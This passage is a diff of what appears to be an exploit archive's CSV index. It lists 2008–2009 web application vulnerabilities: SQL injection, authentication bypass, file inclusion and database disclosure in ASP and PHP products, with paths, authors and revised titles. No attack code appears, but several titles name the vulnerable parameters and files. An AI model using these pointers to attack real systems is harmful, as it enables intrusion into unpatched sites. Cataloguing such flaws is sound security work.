-7295,platforms/asp/webapps/7295.txt,"Active Test 2.1 - 'QuizID' Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7298,platforms/php/webapps/7298.txt,"Active Web Helpdesk 2 - 'categoryId' Blind SQL Injection",2008-11-30,Cyber-Zone,php,webapps,0 -7299,platforms/php/webapps/7299.txt,"Active Photo Gallery 6.2 - (Authentication Bypass) SQL Injection",2008-11-30,R3d-D3V!L,php,webapps,0 -7301,platforms/php/webapps/7301.txt,"Active Time Billing 3.2 - (Authentication Bypass) SQL Injection",2008-11-30,AlpHaNiX,php,webapps,0 +7293,platforms/asp/webapps/7293.txt,"Active Web Helpdesk 2 - Authentication Bypass",2008-11-29,Cyber-Zone,asp,webapps,0 +7294,platforms/php/webapps/7294.pl,"Lito Lite CMS - 'cid' Parameter SQL Injection",2008-11-29,"CWH Underground",php,webapps,0 +7295,platforms/asp/webapps/7295.txt,"Active Test 2.1 - 'QuizID' Parameter Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7298,platforms/php/webapps/7298.txt,"Active Web Helpdesk 2 - 'categoryId' Parameter Blind SQL Injection",2008-11-30,Cyber-Zone,php,webapps,0 +7299,platforms/php/webapps/7299.txt,"Active Photo Gallery 6.2 - Authentication Bypass",2008-11-30,R3d-D3V!L,php,webapps,0 +7301,platforms/php/webapps/7301.txt,"Active Time Billing 3.2 - Authentication Bypass",2008-11-30,AlpHaNiX,php,webapps,0 7302,platforms/php/webapps/7302.txt,"Active Business Directory 2 - Blind SQL Injection",2008-11-30,AlpHaNiX,php,webapps,0 -7303,platforms/php/webapps/7303.txt,"Quick Tree View .NET 3.1 - (qtv.mdb) Database Disclosure",2008-11-30,Cyber-Zone,php,webapps,0 +7303,platforms/php/webapps/7303.txt,"Quick Tree View .NET 3.1 - Database Disclosure",2008-11-30,Cyber-Zone,php,webapps,0 7304,platforms/php/webapps/7304.pl,"KTP Computer Customer Database CMS 1.0 - Local File Inclusion",2008-11-30,"CWH Underground",php,webapps,0 7305,platforms/php/webapps/7305.txt,"KTP Computer Customer Database CMS 1.0 - Blind SQL Injection",2008-11-30,"CWH Underground",php,webapps,0 7306,platforms/php/webapps/7306.txt,"minimal ablog 0.4 - SQL Injection / Arbitrary File Upload / Authentication Bypass",2008-11-30,NoGe,php,webapps,0 7308,platforms/php/webapps/7308.txt,"CPCommerce 1.2.6 - (URL Rewrite) Input Variable Overwrite / Authentication Bypass",2008-11-30,girex,php,webapps,0 7310,platforms/php/webapps/7310.txt,"Broadcast Machine 0.1 - Multiple Remote File Inclusion",2008-11-30,NoGe,php,webapps,0 -7311,platforms/php/webapps/7311.txt,"z1exchange 1.0 - (edit.php site) SQL Injection",2008-12-01,JIKO,php,webapps,0 +7311,platforms/php/webapps/7311.txt,"z1exchange 1.0 - 'site' Parameter SQL Injection",2008-12-01,JIKO,php,webapps,0 7312,platforms/php/webapps/7312.txt,"Andy's PHP KnowledgeBase 0.92.9 - Arbitrary File Upload",2008-12-01,"CWH Underground",php,webapps,0 -7315,platforms/php/webapps/7315.txt,"E.Z. Poll 2 - (Authentication Bypass) SQL Injection",2008-12-01,t0fx,php,webapps,0 -7316,platforms/asp/webapps/7316.txt,"ASPPortal 3.2.5 - (ASPPortal.mdb) Database Disclosure",2008-12-01,"CWH Underground",asp,webapps,0 -7317,platforms/php/webapps/7317.pl,"bcoos 1.0.13 - (viewcat.php cid) SQL Injection",2008-12-01,"CWH Underground",php,webapps,0 -7318,platforms/php/webapps/7318.txt,"PacPoll 4.0 - (poll.mdb/poll97.mdb) Database Disclosure",2008-12-01,AlpHaNiX,php,webapps,0 +7315,platforms/php/webapps/7315.txt,"E.Z. Poll 2 - Authentication Bypass",2008-12-01,t0fx,php,webapps,0 +7316,platforms/asp/webapps/7316.txt,"ASPPortal 3.2.5 - Database Disclosure",2008-12-01,"CWH Underground",asp,webapps,0 +7317,platforms/php/webapps/7317.pl,"bcoos 1.0.13 - 'viewcat.php' SQL Injection",2008-12-01,"CWH Underground",php,webapps,0 +7318,platforms/php/webapps/7318.txt,"PacPoll 4.0 - Database Disclosure",2008-12-01,AlpHaNiX,php,webapps,0 7319,platforms/php/webapps/7319.txt,"Ocean12 Mailing List Manager Gold - File Disclosure / SQL Injection / Cross-Site Scripting",2008-12-02,Pouya_Server,php,webapps,0 7322,platforms/php/webapps/7322.pl,"CMS MAXSITE Component Guestbook - Remote Command Execution",2008-12-02,"CWH Underground",php,webapps,0 -7323,platforms/php/webapps/7323.txt,"SunByte e-Flower - 'id' SQL Injection",2008-12-02,w4rl0ck,php,webapps,0 -7324,platforms/php/webapps/7324.txt,"Rapid Classified 3.1 - (cldb.mdb) Database Disclosure",2008-12-02,CoBRa_21,php,webapps,0 -7325,platforms/asp/webapps/7325.txt,"Codefixer MailingListPro (MailingList.mdb) - Database Disclosure",2008-12-02,AlpHaNiX,asp,webapps,0 -7326,platforms/asp/webapps/7326.txt,"Gallery MX 2.0.0 - (pics_pre.asp ID) Blind SQL Injection",2008-12-03,R3d-D3V!L,asp,webapps,0 +7323,platforms/php/webapps/7323.txt,"SunByte e-Flower - 'id' Parameter SQL Injection",2008-12-02,w4rl0ck,php,webapps,0 +7324,platforms/php/webapps/7324.txt,"Rapid Classified 3.1 - Database Disclosure",2008-12-02,CoBRa_21,php,webapps,0 +7325,platforms/asp/webapps/7325.txt,"Codefixer MailingListPro - Database Disclosure",2008-12-02,AlpHaNiX,asp,webapps,0 +7326,platforms/asp/webapps/7326.txt,"Gallery MX 2.0.0 - Blind SQL Injection",2008-12-03,R3d-D3V!L,asp,webapps,0 7327,platforms/asp/webapps/7327.txt,"Calendar MX Professional 2.0.0 - Blind SQL Injection",2008-12-03,R3d-D3V!L,asp,webapps,0 -7328,platforms/php/webapps/7328.pl,"Check New 4.52 - 'findoffice.php search' SQL Injection",2008-12-03,"CWH Underground",php,webapps,0 -7331,platforms/php/webapps/7331.pl,"Joomla! Component com_jmovies 1.1 - 'id' SQL Injection",2008-12-03,StAkeR,php,webapps,0 +7328,platforms/php/webapps/7328.pl,"Check New 4.52 - SQL Injection",2008-12-03,"CWH Underground",php,webapps,0 +7331,platforms/php/webapps/7331.pl,"Joomla! Component JMovies 1.1 - 'id' Parameter SQL Injection",2008-12-03,StAkeR,php,webapps,0 7332,platforms/php/webapps/7332.txt,"ASP User Engine .NET - Remote Database Disclosure",2008-12-03,AlpHaNiX,php,webapps,0 -7333,platforms/php/webapps/7333.txt,"Rae Media Contact MS - (Authentication Bypass) SQL Injection",2008-12-03,b3hz4d,php,webapps,0 -7335,platforms/php/webapps/7335.txt,"Multi SEO phpBB 1.1.0 - (pfad) Remote File Inclusion",2008-12-03,NoGe,php,webapps,0 -7336,platforms/php/webapps/7336.txt,"ccTiddly 1.7.4 - (cct_base) Multiple Remote File Inclusion",2008-12-04,cOndemned,php,webapps,0 +7333,platforms/php/webapps/7333.txt,"Rae Media Contact MS - Authentication Bypass",2008-12-03,b3hz4d,php,webapps,0 +7335,platforms/php/webapps/7335.txt,"Multi SEO phpBB 1.1.0 - Remote File Inclusion",2008-12-03,NoGe,php,webapps,0 +7336,platforms/php/webapps/7336.txt,"ccTiddly 1.7.4 - 'cct_base' Parameter Remote File Inclusion",2008-12-04,cOndemned,php,webapps,0 7337,platforms/php/webapps/7337.txt,"wbstreet 1.0 - SQL Injection / File Disclosure",2008-12-04,"CWH Underground",php,webapps,0 7338,platforms/php/webapps/7338.txt,"User Engine Lite ASP - 'users.mdb' Database Disclosure",2008-12-04,AlpHaNiX,php,webapps,0 7339,platforms/php/webapps/7339.txt,"template creature - SQL Injection / File Disclosure",2008-12-04,ZoRLu,php,webapps,0 -7340,platforms/asp/webapps/7340.txt,"Easy News Content Management - 'News.mdb' Database Disclosure",2008-12-04,BeyazKurt,asp,webapps,0 +7340,platforms/asp/webapps/7340.txt,"Easy News Content Management - Database Disclosure",2008-12-04,BeyazKurt,asp,webapps,0 7341,platforms/php/webapps/7341.txt,"lcxbbportal 0.1 alpha 2 - Remote File Inclusion",2008-12-04,NoGe,php,webapps,0 -7342,platforms/php/webapps/7342.txt,"My Simple Forum 3.0 - (index.php action) Local File Inclusion",2008-12-04,cOndemned,php,webapps,0 -7343,platforms/php/webapps/7343.txt,"Joomla! Component mydyngallery 1.4.2 - (Directory) SQL Injection",2008-12-04,"Khashayar Fereidani",php,webapps,0 -7344,platforms/php/webapps/7344.txt,"Gravity GTD 0.4.5 - (rpc.php objectname) Local File Inclusion / Remote Code Execution",2008-12-04,dun,php,webapps,0 +7342,platforms/php/webapps/7342.txt,"My Simple Forum 3.0 - Local File Inclusion",2008-12-04,cOndemned,php,webapps,0 +7343,platforms/php/webapps/7343.txt,"Joomla! Component mydyngallery 1.4.2 - SQL Injection",2008-12-04,"Khashayar Fereidani",php,webapps,0 +7344,platforms/php/webapps/7344.txt,"Gravity GTD 0.4.5 - Local File Inclusion / Remote Code Execution",2008-12-04,dun,php,webapps,0 7345,platforms/php/webapps/7345.txt,"BNCwi 1.04 - Local File Inclusion",2008-12-04,dun,php,webapps,0 7346,platforms/php/webapps/7346.txt,"Multiple Membership Script 2.5 - 'id' SQL Injection",2008-12-05,ViRuS_HaCkErS,php,webapps,0 7348,platforms/asp/webapps/7348.txt,"merlix educate servert - Authentication Bypass / File Disclosure",2008-12-05,ZoRLu,asp,webapps,0 -7349,platforms/asp/webapps/7349.txt,"RankEm - 'rankup.asp siteID' SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0 -7350,platforms/asp/webapps/7350.txt,"RankEm - (Authentication Bypass) SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0 +7349,platforms/asp/webapps/7349.txt,"RankEm - 'siteID' Parameter SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0 +7350,platforms/asp/webapps/7350.txt,"Rankem - Authentication Bypass",2008-12-05,AlpHaNiX,asp,webapps,0 7351,platforms/php/webapps/7351.txt,"nightfall personal diary 1.0 - Cross-Site Scripting / File Disclosure",2008-12-05,AlpHaNiX,php,webapps,0 -7352,platforms/php/webapps/7352.txt,"Merlix Teamworx Server - (File Disclosure/Bypass) Multiple Remote Vulnerabilities",2008-12-05,ZoRLu,php,webapps,0 -7353,platforms/asp/webapps/7353.txt,"Cold BBS - 'cforum.mdb' Remote Database Disclosure",2008-12-05,ahmadbady,asp,webapps,0 -7354,platforms/php/webapps/7354.txt,"Tizag Countdown Creator .v.3 - Insecure Upload",2008-12-05,ahmadbady,php,webapps,0 +7352,platforms/php/webapps/7352.txt,"Merlix Teamworx Server - File Disclosure/Bypass",2008-12-05,ZoRLu,php,webapps,0 +7353,platforms/asp/webapps/7353.txt,"Cold BBS - Remote Database Disclosure",2008-12-05,ahmadbady,asp,webapps,0 +7354,platforms/php/webapps/7354.txt,"Tizag Countdown Creator 3 - Insecure Upload",2008-12-05,ahmadbady,php,webapps,0 7356,platforms/asp/webapps/7356.txt,"ASP AutoDealer - SQL Injection / File Disclosure",2008-12-05,AlpHaNiX,asp,webapps,0 -7357,platforms/asp/webapps/7357.txt,"ASP PORTAL - Multiple SQL Injections",2008-12-05,AlpHaNiX,asp,webapps,0 -7359,platforms/asp/webapps/7359.txt,"ASPTicker 1.0 - (news.mdb) Remote Database Disclosure",2008-12-05,ZoRLu,asp,webapps,0 +7357,platforms/asp/webapps/7357.txt,"ASP Portal - Multiple SQL Injections",2008-12-05,AlpHaNiX,asp,webapps,0 +7359,platforms/asp/webapps/7359.txt,"ASPTicker 1.0 - Remote Database Disclosure",2008-12-05,ZoRLu,asp,webapps,0 7360,platforms/asp/webapps/7360.txt,"ASP AutoDealer - Remote Database Disclosure",2008-12-06,ZoRLu,asp,webapps,0 -7361,platforms/asp/webapps/7361.txt,"ASP PORTAL - 'xportal.mdb' Remote Database Disclosure",2008-12-06,ZoRLu,asp,webapps,0 -7363,platforms/php/webapps/7363.txt,"phpPgAdmin 4.2.1 - (_language) Local File Inclusion",2008-12-06,dun,php,webapps,0 +7361,platforms/asp/webapps/7361.txt,"ASP PORTAL - Remote Database Disclosure",2008-12-06,ZoRLu,asp,webapps,0 +7363,platforms/php/webapps/7363.txt,"phpPgAdmin 4.2.1 - '_language' Parameter Local File Inclusion",2008-12-06,dun,php,webapps,0 7364,platforms/php/webapps/7364.php,"IPNPro3 <= 1.44 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 7365,platforms/php/webapps/7365.php,"DL PayCart 1.34 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 7366,platforms/php/webapps/7366.php,"Bonza Cart 1.10 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 -7367,platforms/php/webapps/7367.php,"PayPal eStore - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 -7368,platforms/php/webapps/7368.txt,"Product Sale Framework 0.1b - (forum_topic_id) SQL Injection",2008-12-07,b3hz4d,php,webapps,0 +7367,platforms/php/webapps/7367.php,"PayPal eStore - Admin Password Change",2008-12-07,G4N0K,php,webapps,0 +7368,platforms/php/webapps/7368.txt,"Product Sale Framework 0.1b - SQL Injection",2008-12-07,b3hz4d,php,webapps,0 7369,platforms/php/webapps/7369.pl,"w3blabor CMS 3.0.5 - Arbitrary File Upload / Local File Inclusion",2008-12-07,DNX,php,webapps,0 7370,platforms/asp/webapps/7370.txt,"Natterchat 1.12 - Database Disclosure",2008-12-07,AlpHaNiX,asp,webapps,0 7371,platforms/asp/webapps/7371.txt,"Professional Download Assistant 0.1 - Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0 7372,platforms/asp/webapps/7372.txt,"Ikon ADManager 2.1 - Remote Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0 7373,platforms/asp/webapps/7373.txt,"aspmanage banners - Arbitrary File Upload / File Disclosure",2008-12-07,ZoRLu,asp,webapps,0 7374,platforms/php/webapps/7374.txt,"Mini Blog 1.0.1 - 'index.php' Multiple Local File Inclusion",2008-12-07,cOndemned,php,webapps,0 -7375,platforms/php/webapps/7375.txt,"Mini-CMS 1.0.1 - 'index.php' Multiple Local File Inclusion",2008-12-07,cOndemned,php,webapps,0 +7375,platforms/php/webapps/7375.txt,"Mini-CMS 1.0.1 - 'index.php' Local File Inclusion",2008-12-07,cOndemned,php,webapps,0 7376,platforms/asp/webapps/7376.txt,"QMail Mailing List Manager 1.2 - Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0 7377,platforms/php/webapps/7377.txt,"PHPmyGallery Gold 1.51 - 'index.php' Directory Traversal",2008-12-07,zAx,php,webapps,0 7378,platforms/asp/webapps/7378.txt,"asp talk - SQL Injection / Cross-Site Scripting",2008-12-07,Bl@ckbe@rD,asp,webapps,0 -7379,platforms/php/webapps/7379.txt,"MG2 0.5.1 - 'Filename' Remote Code Execution",2008-12-08,"Alfons Luja",php,webapps,0 +7379,platforms/php/webapps/7379.txt,"MG2 0.5.1 - 'filename' Parameter Remote Code Execution",2008-12-08,"Alfons Luja",php,webapps,0 7380,platforms/php/webapps/7380.txt,"XOOPS 2.3.1 - Multiple Local File Inclusion",2008-12-08,DSecRG,php,webapps,0 7381,platforms/php/webapps/7381.txt,"siu guarani - Multiple Vulnerabilities",2008-12-08,"Ubik & proudhon",php,webapps,0 7382,platforms/php/webapps/7382.txt,"phpMyAdmin 3.1.0 - Cross-Site Request Forgery / SQL Injection",2008-12-08,"Michael Brooks",php,webapps,0 @@ -20198,18 +20199,18 @@ id,file,description,date,author,platform,type,port 7385,platforms/php/webapps/7385.txt,"vBulletin Secure Downloads 2.0.0r - SQL Injection",2008-12-08,Cnaph,php,webapps,0 7386,platforms/php/webapps/7386.pl,"phpBB 3 - (Mod Tag Board 4) Blind SQL Injection",2008-12-08,StAkeR,php,webapps,0 7388,platforms/php/webapps/7388.txt,"webcaf 1.4 - Local File Inclusion / Remote Code Execution",2008-12-08,dun,php,webapps,0 -7390,platforms/asp/webapps/7390.txt,"dotnetindex Professional Download Assistant 0.1 - (Authentication Bypass) SQL Injection",2008-12-09,ZoRLu,asp,webapps,0 -7391,platforms/asp/webapps/7391.txt,"Poll Pro 2.0 - (Authentication Bypass) SQL Injection",2008-12-09,AlpHaNiX,asp,webapps,0 +7390,platforms/asp/webapps/7390.txt,"Professional Download Assistant 0.1 - Authentication Bypass",2008-12-09,ZoRLu,asp,webapps,0 +7391,platforms/asp/webapps/7391.txt,"Poll Pro 2.0 - Authentication Bypass",2008-12-09,AlpHaNiX,asp,webapps,0 7392,platforms/php/webapps/7392.txt,"PHPmyGallery 1.0beta2 - Remote File Inclusion / Local File Inclusion",2008-12-09,ZoRLu,php,webapps,0 -7395,platforms/php/webapps/7395.txt,"Peel Shopping 3.1 - (index.php rubid) SQL Injection",2008-12-09,SuB-ZeRo,php,webapps,0 +7395,platforms/php/webapps/7395.txt,"Peel Shopping 3.1 - 'rubid' Parameter SQL Injection",2008-12-09,SuB-ZeRo,php,webapps,0 7396,platforms/php/webapps/7396.txt,"Netref 4.0 - Multiple SQL Injections",2008-12-09,SuB-ZeRo,php,webapps,0 -7397,platforms/php/webapps/7397.txt,"ProQuiz 1.0 - (Authentication Bypass) SQL Injection",2008-12-09,Osirys,php,webapps,0 +7397,platforms/php/webapps/7397.txt,"ProQuiz 1.0 - Authentication Bypass",2008-12-09,Osirys,php,webapps,0 7398,platforms/asp/webapps/7398.txt,"postecards - SQL Injection / File Disclosure",2008-12-09,AlpHaNiX,asp,webapps,0 -7399,platforms/php/webapps/7399.txt,"PHPmyGallery 1.5beta - (common-tpl-vars.php) Local File Inclusion / Remote File Inclusion",2008-12-09,CoBRa_21,php,webapps,0 +7399,platforms/php/webapps/7399.txt,"PHPmyGallery 1.5beta - 'common-tpl-vars.php' Local / Remote File Inclusion",2008-12-09,CoBRa_21,php,webapps,0 7400,platforms/php/webapps/7400.txt,"PHP Multiple Newsletters 2.7 - Local File Inclusion / Cross-Site Scripting",2008-12-09,ahmadbady,php,webapps,0 -7404,platforms/cgi/webapps/7404.txt,"HTMPL 1.11 - (htmpl_admin.cgi help) Command Execution",2008-12-10,ZeN,cgi,webapps,0 -7406,platforms/php/webapps/7406.php,"eZ Publish < 3.9.5/3.10.1/4.0.1 - Privilege Escalation",2008-12-10,s4avrd0w,php,webapps,0 -7407,platforms/php/webapps/7407.txt,"WebMaster Marketplace - 'member.php u' SQL Injection",2008-12-10,"Hussin X",php,webapps,0 +7404,platforms/cgi/webapps/7404.txt,"HTMPL 1.11 - Command Execution",2008-12-10,ZeN,cgi,webapps,0 +7406,platforms/php/webapps/7406.php,"EZ Publish < 3.9.5/3.10.1/4.0.1 - Privilege Escalation",2008-12-10,s4avrd0w,php,webapps,0 +7407,platforms/php/webapps/7407.txt,"WebMaster Marketplace - SQL Injection",2008-12-10,"Hussin X",php,webapps,0 7408,platforms/php/webapps/7408.txt,"living Local 1.1 - Cross-Site Scripting / Arbitrary File Upload",2008-12-10,Bgh7,php,webapps,0 7409,platforms/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 - Cross-Site Scripting / Cross-Site Request Forgery",2008-12-10,ZynbER,php,webapps,0 7411,platforms/php/webapps/7411.txt,"Butterfly ORGanizer 2.0.1 - 'id' Parameter SQL Injection",2008-12-10,Osirys,php,webapps,0 @@ -20222,7 +20223,7 @@ id,file,description,date,author,platform,type,port 7418,platforms/php/webapps/7418.txt,"PhpAddEdit 1.3 - 'cookie' Login Bypass",2008-12-11,x0r,php,webapps,0 7419,platforms/asp/webapps/7419.txt,"evCal Events Calendar - Database Disclosure",2008-12-11,Cyber-Zone,asp,webapps,0 7420,platforms/asp/webapps/7420.txt,"MyCal Personal Events Calendar - 'mycal.mdb' Database Disclosure",2008-12-11,CoBRa_21,asp,webapps,0 -7421,platforms/php/webapps/7421.txt,"eZ Publish 3.9.0/3.9.5/3.10.1 - Command Execution (Admin Required)",2008-12-11,s4avrd0w,php,webapps,0 +7421,platforms/php/webapps/7421.txt,"EZ Publish 3.9.0/3.9.5/3.10.1 - Command Execution (Admin Required)",2008-12-11,s4avrd0w,php,webapps,0 7422,platforms/php/webapps/7422.txt,"Feed CMS 1.07.03.19b - 'lang' Local File Inclusion",2008-12-11,x0r,php,webapps,0 7423,platforms/asp/webapps/7423.txt,"Affiliate Software Java 4.0 - (Authentication Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0 7424,platforms/asp/webapps/7424.txt,"Ad Management Java - (Authentication Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0 @@ -20268,7 +20269,7 @@ id,file,description,date,author,platform,type,port 7470,platforms/asp/webapps/7470.txt,"CodeAvalanche FreeWallpaper - Remote Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 7471,platforms/asp/webapps/7471.txt,"CodeAvalanche Articles - 'CAArticles.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 7472,platforms/asp/webapps/7472.txt,"CodeAvalanche RateMySite - 'CARateMySite.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 -7473,platforms/php/webapps/7473.php,"eZ Publish < 3.9.5/3.10.1/4.0.1 - (token) Privilege Escalation",2008-12-15,s4avrd0w,php,webapps,0 +7473,platforms/php/webapps/7473.php,"EZ Publish < 3.9.5/3.10.1/4.0.1 - (token) Privilege Escalation",2008-12-15,s4avrd0w,php,webapps,0 7474,platforms/php/webapps/7474.txt,"FLDS 1.2a - (lpro.php id) SQL Injection",2008-12-15,nuclear,php,webapps,0 7475,platforms/php/webapps/7475.txt,"BabbleBoard 1.1.6 - 'Username' Cross-Site Request Forgery/Cookie Grabber Exploit",2008-12-15,SirGod,php,webapps,0 7476,platforms/php/webapps/7476.txt,"Mediatheka 4.2 - Blind SQL Injection",2008-12-15,StAkeR,php,webapps,0 @@ -20308,7 +20309,7 @@ id,file,description,date,author,platform,type,port 7518,platforms/php/webapps/7518.txt,"Gobbl CMS 1.0 - Insecure Cookie Handling",2008-12-18,x0r,php,webapps,0 7519,platforms/php/webapps/7519.txt,"MyPHPsite - 'index.php mod' Local File Inclusion",2008-12-18,Piker,php,webapps,0 7522,platforms/php/webapps/7522.pl,"MyPBS - 'index.php seasonID' SQL Injection",2008-12-19,Piker,php,webapps,0 -7523,platforms/php/webapps/7523.php,"ReVou Twitter Clone - Admin Password Changing Exploit",2008-12-19,G4N0K,php,webapps,0 +7523,platforms/php/webapps/7523.php,"ReVou Twitter Clone - Admin Password Change",2008-12-19,G4N0K,php,webapps,0 7524,platforms/php/webapps/7524.txt,"Online Keyword Research Tool - 'download.php' File Disclosure",2008-12-19,"Cold Zero",php,webapps,0 7525,platforms/php/webapps/7525.txt,"Extract Website - 'download.php Filename' File Disclosure",2008-12-19,"Cold Zero",php,webapps,0 7526,platforms/php/webapps/7526.txt,"myPHPscripts Login Session 2.0 - Cross-Site Scripting / Database Disclosure",2008-12-19,Osirys,php,webapps,0 @@ -20393,7 +20394,7 @@ id,file,description,date,author,platform,type,port 7636,platforms/php/webapps/7636.pl,"PHPFootball 1.6 - Remote Hash Disclosure",2009-01-01,KinG-LioN,php,webapps,0 7638,platforms/php/webapps/7638.txt,"Memberkit 1.0 - Remote Arbitrary .PHP File Upload",2009-01-01,Lo$er,php,webapps,0 7639,platforms/php/webapps/7639.txt,"phpScribe 0.9 - (user.cfg) Remote Config Disclosure",2009-01-01,ahmadbady,php,webapps,0 -7640,platforms/php/webapps/7640.txt,"w3blabor CMS 3.3.0 - (Authentication Bypass) SQL Injection",2009-01-01,DNX,php,webapps,0 +7640,platforms/php/webapps/7640.txt,"w3blabor CMS 3.3.0 - Authentication Bypass",2009-01-01,DNX,php,webapps,0 7641,platforms/php/webapps/7641.txt,"PowerNews 2.5.4 - 'newsid' Parameter SQL Injection",2009-01-01,"Virangar Security",php,webapps,0 7642,platforms/php/webapps/7642.txt,"PowerClan 1.14a - (Authentication Bypass) SQL Injection",2009-01-01,"Virangar Security",php,webapps,0 7644,platforms/php/webapps/7644.txt,"Built2Go PHP Link Portal 1.95.1 - Arbitrary File Upload",2009-01-02,ZoRLu,php,webapps,0 @@ -20495,7 +20496,7 @@ id,file,description,date,author,platform,type,port 7801,platforms/asp/webapps/7801.txt,"eReservations - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0 7802,platforms/asp/webapps/7802.txt,"The Walking Club - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0 7803,platforms/asp/webapps/7803.txt,"Ping IP - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0 -7805,platforms/php/webapps/7805.txt,"rankem - File Disclosure / Cross-Site Scripting / Cookie",2009-01-16,Pouya_Server,php,webapps,0 +7805,platforms/php/webapps/7805.txt,"Rankem - File Disclosure / Cross-Site Scripting / Cookie",2009-01-16,Pouya_Server,php,webapps,0 7806,platforms/php/webapps/7806.txt,"blogit! - SQL Injection / File Disclosure / Cross-Site Scripting",2009-01-16,Pouya_Server,php,webapps,0 7807,platforms/asp/webapps/7807.txt,"ASP ActionCalendar 1.3 - (Authentication Bypass) SQL Injection",2009-01-16,SuB-ZeRo,asp,webapps,0 7809,platforms/php/webapps/7809.txt,"Aj Classifieds Real Estate 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0 @@ -20569,7 +20570,7 @@ id,file,description,date,author,platform,type,port 7917,platforms/php/webapps/7917.php,"PLE CMS 1.0 Beta 4.2 - (login.php school) Blind SQL Injection",2009-01-29,darkjoker,php,webapps,0 7922,platforms/php/webapps/7922.txt,"Pligg 9.9.5 - Cross-Site Request Forgery / Protection Bypass / Captcha Bypass",2009-01-29,"Michael Brooks",php,webapps,0 7924,platforms/asp/webapps/7924.txt,"SalesCart - (Authentication Bypass) SQL Injection",2009-01-30,ByALBAYX,asp,webapps,0 -7925,platforms/php/webapps/7925.txt,"revou twitter clone - Cross-Site Scripting / SQL Injection",2009-01-30,nuclear,php,webapps,0 +7925,platforms/php/webapps/7925.txt,"Revou Twitter Clone - Cross-Site Scripting / SQL Injection",2009-01-30,nuclear,php,webapps,0 7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 - (09.01.30) Multiple Local+Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0 7930,platforms/php/webapps/7930.txt,"bpautosales 1.0.1 - Cross-Site Scripting / SQL Injection",2009-01-30,"Mehmet Ince",php,webapps,0 7931,platforms/php/webapps/7931.txt,"Orca 2.0.2 - 'topic ' Cross-Site Scripting",2009-01-30,J-Hacker,php,webapps,0 @@ -20781,7 +20782,7 @@ id,file,description,date,author,platform,type,port 8293,platforms/php/webapps/8293.txt,"Free PHP Petition Signing Script - (Authentication Bypass) SQL Injection",2009-03-27,Qabandi,php,webapps,0 8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script - 'Username' Static Cross-Site Scripting",2009-03-27,"Anarchy Angel",php,webapps,0 8297,platforms/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure",2009-03-27,"Christian J. Eibl",php,webapps,0 -8298,platforms/php/webapps/8298.pl,"My Simple Forum 7.1 - (Local File Inclusion) Remote Command Execution",2009-03-27,Osirys,php,webapps,0 +8298,platforms/php/webapps/8298.pl,"My Simple Forum 7.1 - Remote Command Execution",2009-03-27,Osirys,php,webapps,0 8302,platforms/php/webapps/8302.php,"glFusion 1.1.2 - COM_applyFilter()/order SQL Injection",2009-03-29,Nine:Situations:Group,php,webapps,0 8304,platforms/php/webapps/8304.txt,"Arcadwy Arcade Script - (Authentication Bypass) Insecure Cookie Handling",2009-03-29,ZoRLu,php,webapps,0 8305,platforms/php/webapps/8305.txt,"iWare CMS 5.0.4 - Multiple SQL Injections",2009-03-29,boom3rang,php,webapps,0 @@ -21451,7 +21452,7 @@ id,file,description,date,author,platform,type,port 9400,platforms/php/webapps/9400.txt,"logoshows bbs 2.0 - File Disclosure / Insecure Cookie Handling",2009-08-07,ZoRLu,php,webapps,0 9404,platforms/php/webapps/9404.txt,"SmilieScript 1.0 - (Authentication Bypass) SQL Injection",2009-08-10,Mr.tro0oqy,php,webapps,0 9405,platforms/php/webapps/9405.txt,"Papoo CMS 3.7.3 - Authenticated Arbitrary Code Execution",2009-08-10,"RedTeam Pentesting",php,webapps,0 -9406,platforms/php/webapps/9406.txt,"Mini-CMS 1.0.1 - (page.php id) SQL Injection",2009-08-10,Ins3t,php,webapps,0 +9406,platforms/php/webapps/9406.txt,"Mini-CMS 1.0.1 - 'page.php' SQL Injection",2009-08-10,Ins3t,php,webapps,0 9407,platforms/php/webapps/9407.txt,"CMS Made Simple 1.6.2 - Local File Disclosure",2009-08-10,IHTeam,php,webapps,0 9408,platforms/php/webapps/9408.php,"Joomla! Component Kunena Forums (com_kunena) - Blind SQL Injection",2009-08-10,"ilker Kandemir",php,webapps,0 9410,platforms/php/webapps/9410.txt,"WordPress 2.8.3 - Remote Admin Reset Password",2009-08-11,"laurent gaffié",php,webapps,0 @@ -21904,7 +21905,7 @@ id,file,description,date,author,platform,type,port 10498,platforms/php/webapps/10498.txt,"Pre Hospital Management System - 'department.php id' SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 10499,platforms/php/webapps/10499.txt,"eUploader PRO 3.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2009-12-16,"Milos Zivanovic",php,webapps,0 10500,platforms/php/webapps/10500.txt,"Omnistar Affiliate - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 -10501,platforms/asp/webapps/10501.txt,"Texas Rankem - 'player.asp player_id' SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 +10501,platforms/asp/webapps/10501.txt,"Texas Rankem - 'player_id' Parameter SQL 